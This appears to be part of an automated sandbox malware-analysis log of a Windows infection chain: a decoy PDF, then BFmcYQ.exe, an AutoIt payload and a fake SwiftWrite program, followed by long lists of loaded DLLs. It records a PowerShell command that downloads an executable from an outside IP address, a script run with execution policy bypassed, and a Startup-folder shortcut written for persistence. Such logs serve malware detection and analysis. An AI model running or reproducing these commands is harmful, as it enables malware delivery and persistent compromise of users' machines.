Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\test.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1652,i,1199563268995675022,292876181194953866,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\BFmcYQ.exe "C:\Users\user\AppData\Roaming\BFmcYQ.exe"
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\forfiles.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
